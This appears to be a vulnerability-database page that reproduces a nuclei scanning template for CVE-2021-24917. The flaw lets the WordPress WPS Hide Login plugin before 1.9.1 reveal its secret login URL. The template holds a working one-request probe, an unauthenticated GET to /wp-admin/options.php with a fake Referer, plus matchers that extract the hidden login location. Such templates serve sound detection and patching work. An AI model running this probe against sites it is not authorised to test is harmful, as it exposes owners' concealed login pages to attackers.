Lucene search
K

WordPress WPS Hide Login <1.9.1 - Information Disclosure

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 478 Views

WordPress WPS Hide Login <1.9.1 - Information Disclosure. Vulnerability allows attacker to discover secret login page URL

Related
Refs
Code
id: CVE-2021-24917

info:
  name: WordPress WPS Hide Login <1.9.1 - Information Disclosure
  author: akincibor
  severity: high
  description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.
  impact: |
    An attacker can gain sensitive information about the WordPress site, such as the login page URL.
  remediation: Fixed in version 1.9.1.
  reference:
    - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24917
    - https://wordpress.org/support/topic/bypass-security-issue/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24917
    cwe-id: CWE-863
    epss-score: 0.71532
    epss-percentile: 0.9934
    cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpserveur
    product: wps_hide_login
    framework: wordpress
  tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur,vuln

http:
  - raw:
      - |
        GET /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Referer: something

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(location), 'wp-login.php')"

      - type: word
        part: header
        words:
          - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'

    extractors:
      - type: kval
        kval:
          - location
# digest: 490a00463044022046fe07ec2d199118a60441157759b06b737d82ca1524ed153d57b21ff5d603bd02206dc0d240eeea0c4747ff0027d61f2e7a928b1bb54889f4d17a1e618261a70509:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.71532
478